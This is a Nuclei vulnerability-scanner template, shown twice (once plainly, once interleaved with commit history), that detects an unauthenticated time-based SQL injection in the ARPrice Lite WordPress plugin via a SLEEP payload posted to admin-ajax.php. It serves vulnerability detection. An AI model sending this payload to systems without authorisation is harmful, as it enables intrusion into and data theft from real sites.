nuclei-templates/cves/2022/CVE-2022-0867.yaml

id: CVE-2022-0867

info:
  name: ARPrice Lite < 3.6.1 - Unauthenticated SQLi
  author: theamanrawat
  severity: critical
  description: |
    The Pricing Table WordPress plugin before 3.6.1 fails to properly sanitize and escape user supplied POST data before it is being interpolated in an SQL statement and then executed via an AJAX action available to unauthenticated users.
  reference:
    - https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494
    - https://wordpress.org/plugins/arprice-responsive-pricing-table/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0867
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0867
    cwe-id: CWE-89
  metadata:
    verified: "true"
  tags: unauth,wp,cve2022,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,cve

requests:
  - raw:
      - |
        @timeout: 10s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)

      - |
        GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'status_code_1 == 200'
          - 'contains(content_type_1, "text/html")'
          - 'contains(body_2, "ArpPriceTable")'
        condition: and
Added template for CVE-2022-0867 2022-10-27 06:47:11 +00:00			`id: CVE-2022-0867`

			`info:`
			`name: ARPrice Lite < 3.6.1 - Unauthenticated SQLi`
			`author: theamanrawat`
			`severity: critical`
			`description: \|`
			`The Pricing Table WordPress plugin before 3.6.1 fails to properly sanitize and escape user supplied POST data before it is being interpolated in an SQL statement and then executed via an AJAX action available to unauthenticated users.`
			`reference:`
			`- https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494`
			`- https://wordpress.org/plugins/arprice-responsive-pricing-table/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-0867`
			`classification:`
Auto Generated CVE annotations [Wed Nov 9 21:55:05 UTC 2022] :robot: 2022-11-09 21:55:05 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Added template for CVE-2022-0867 2022-10-27 06:47:11 +00:00			`cve-id: CVE-2022-0867`
Auto Generated CVE annotations [Wed Nov 9 21:55:05 UTC 2022] :robot: 2022-11-09 21:55:05 +00:00			`cwe-id: CWE-89`
Added template for CVE-2022-0867 2022-10-27 06:47:11 +00:00			`metadata:`
Auto Generated CVE annotations [Wed Nov 9 21:55:05 UTC 2022] :robot: 2022-11-09 21:55:05 +00:00			`verified: "true"`
			`tags: unauth,wp,cve2022,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,cve`
Added template for CVE-2022-0867 2022-10-27 06:47:11 +00:00
			`requests:`
			`- raw:`
			`- \|`
Update CVE-2022-0867.yaml 2022-11-08 09:14:47 +00:00			`@timeout: 10s`
Added template for CVE-2022-0867 2022-10-27 06:47:11 +00:00			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

Update CVE-2022-0867.yaml 2022-11-08 09:14:47 +00:00			`action=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)`
Added template for CVE-2022-0867 2022-10-27 06:47:11 +00:00
Update CVE-2022-0867.yaml 2022-11-08 09:14:47 +00:00			`- \|`
			`GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1`
			`Host: {{Hostname}}`

			`req-condition: true`
Added template for CVE-2022-0867 2022-10-27 06:47:11 +00:00			`matchers:`
			`- type: dsl`
			`dsl:`
Update CVE-2022-0867.yaml 2022-11-08 09:14:47 +00:00			`- 'duration_1>=6'`
			`- 'status_code_1 == 200'`
			`- 'contains(content_type_1, "text/html")'`
			`- 'contains(body_2, "ArpPriceTable")'`
			`condition: and`